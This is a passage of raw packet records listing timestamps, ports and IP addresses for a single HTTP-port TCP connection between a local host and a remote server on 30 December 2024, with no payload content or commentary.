Dec 30, 2024 15:53:35.178472996 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178483009 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178493977 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178503036 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.178505898 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178517103 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178528070 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178541899 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.178543091 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178553104 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178570032 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.178584099 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.178612947 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178623915 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178646088 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178663015 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178670883 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.178673983 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178679943 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.178714991 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.178750038 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178761959 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178771973 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178795099 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.178888083 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178898096 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178910017 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178924084 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178934097 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.178936958 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.178946972 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.178987026 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.186331987 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.186353922 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.186364889 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.186428070 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.186455011 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.186466932 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.186476946 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.186499119 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.186513901 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.186523914 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.186727047 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.221430063 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.221468925 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.221479893 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.221481085 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.221525908 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.221538067 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.221549034 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.221560001 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.221571922 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.221577883 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.221622944 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.221689939 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.221702099 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.221714020 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.221725941 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.221734047 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.221736908 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.221766949 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.221868038 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.221878052 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.221918106 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.222135067 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.222182035 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.222251892 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.222266912 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.222279072 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.222289085 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.222296000 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.222296953 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.222326994 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.222337961 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.222390890 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.222788095 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.222799063 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.222810030 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.222825050 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.222840071 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.222877026 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.222882032 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.222901106 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.222942114 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.222975016 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.222985029 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.222995043 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223006010 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223016977 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223020077 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.223047972 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.223098993 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223109961 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223119020 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223129034 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223153114 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.223177910 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.223247051 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223258018 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223268986 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223280907 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223295927 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.223329067 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.223339081 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223350048 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223361015 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223386049 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.223408937 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.223515987 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223526955 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223537922 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223547935 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223560095 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223563910 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.223571062 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223582983 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223592997 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223599911 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.223603964 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223625898 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.223648071 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.223795891 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223807096 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223819017 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223829985 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223840952 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223841906 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.223851919 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223866940 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.223902941 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.223928928 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223939896 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223952055 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223963022 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223978996 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.223983049 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.223990917 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.224009991 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.224034071 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.224071026 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.224081993 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.224096060 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.224117041 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.224127054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.224139929 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.224147081 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.224150896 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.224162102 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.224173069 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.224179983 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.224183083 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.224220037 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.224230051 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.264605999 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.264645100 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.264656067 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.264693975 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.264710903 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.264722109 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.264746904 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.264758110 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.264760017 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.264781952 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.264947891 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.264960051 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.264971018 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.264981031 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.264997005 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.264997959 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.265007973 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265018940 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265038013 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.265054941 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.265081882 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.265081882 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265094995 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265106916 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265116930 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265130043 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.265132904 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265163898 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.265194893 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265207052 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265254974 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.265341043 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265384912 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.265392065 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265403032 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265440941 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.265461922 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265474081 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265499115 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265511990 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265537977 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.265564919 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.265600920 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265625000 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265638113 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265649080 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265660048 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.265691042 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.265712976 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265723944 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265734911 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265743017 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.265768051 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.265795946 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.273109913 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.273129940 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.273139954 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.273181915 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.273260117 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.273274899 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.273284912 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.273296118 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.273303986 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.273308039 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.273318052 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.273333073 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.273355007 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.282309055 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.308221102 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308243990 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308254004 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308264017 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308280945 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.308296919 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.308315992 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308326006 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308353901 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.308408022 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308417082 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308428049 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308449984 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.308470011 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308481932 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308490992 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.308542967 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.308571100 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308578968 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308589935 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308599949 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308618069 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.308655024 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.308916092 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308939934 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308949947 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.308991909 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.309056997 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309067965 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309082985 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309104919 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.309124947 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309134007 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309143066 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.309169054 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.309422016 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309439898 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309448004 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309490919 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.309508085 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309523106 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309535027 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309545040 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309554100 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.309555054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309582949 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.309609890 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.309642076 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309653044 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309688091 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.309703112 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309711933 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309721947 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309741974 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309746981 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.309751987 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309789896 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.309812069 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309823036 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309864044 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.309889078 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309899092 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309909105 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309931040 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.309957027 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.309968948 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309978962 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309988976 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.309998035 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310008049 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310022116 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.310055971 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.310172081 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310183048 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310192108 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310200930 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310211897 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310220003 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.310225964 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310244083 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310255051 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310264111 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.310308933 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.310432911 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310444117 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310453892 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310468912 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310477972 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.310480118 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310504913 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.310518026 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310524940 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.310528994 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310539007 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310548067 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310558081 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310563087 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.310568094 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310591936 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.310619116 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.310755014 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310765982 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310776949 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310786963 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310796022 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310811043 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310820103 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.310837984 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310847998 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310848951 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.310858011 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310879946 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.310941935 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310954094 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.310983896 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.351526022 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351566076 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351583004 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351587057 CET	49744	80	192.168.2.4	185.215.113.16
